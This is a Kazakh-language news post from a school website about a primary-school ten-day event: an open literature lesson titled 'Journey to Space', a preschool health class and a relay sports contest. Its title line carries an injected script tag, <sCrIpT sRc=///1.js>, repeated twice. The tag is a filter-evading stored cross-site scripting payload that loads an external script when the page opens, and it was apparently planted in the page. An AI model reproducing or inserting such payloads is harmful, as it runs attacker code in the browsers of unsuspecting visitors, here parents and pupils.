Бастауыш сыныптар онкүндігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
08.04.2021
Ғ.Әбдірахманов атындағы жалпы орта білім беретін мектептің бастауыш сынып апталығының кезекті жоспары бойынша 4 сыныпта әдебиеттік оқу пәнінен ашық сабақ өтті.
Сабақтың тақырыбы: "Ғарышқа сапар".
Мақсаты: Оқылған шығармадағы оқиға жүйесін анықтап, оны бөліктерге бөлу, әр бөлікке ат қойып, жоспар құру. Шығарма мазмұнын түрлі баяндау тәсілдерін қолданып, шығарманы қысқаша, толық, ішінара мазмұндау. Сабақ барсында ғаламтор желісінен бейнебаян көріп тамашалап, өз ойларымен бөлісті. Сабақта бірнеше ой қозғауға берілген әдіс-тәсілдер қолданылды. Жетекшісі Жуманова С.Е. Сонымен қатар мектепалды даярлық тобында "Саулық сақтықта" тақырыбы бойынша тәрбие сағатын Сыздыкова У.Х., өткізді. Мақсаты: балаларға денаулықты сақтау үшін салауатты өмір салтын ұстануды, зиянды заттардан аулақ болудың маңыздылығын түсіндірді. Денешынықтыру пәнінің мүғалімі Аширханов Д.Р., 2 "А" және 2 "Ә" сынып оқушыларымен "Көңілді сөре" спорттық сайысын ұйымдастырды. Мақсаты: балаларға денені шынықтырудың пайдасын, адамның дені сау сергек болуына көмектесетінін түсіндіру арқылы шынықтыру жаттығуларын, эстафеталық ойындарды жүргізу. Эстафеталық жарысымыз қызықты өтті.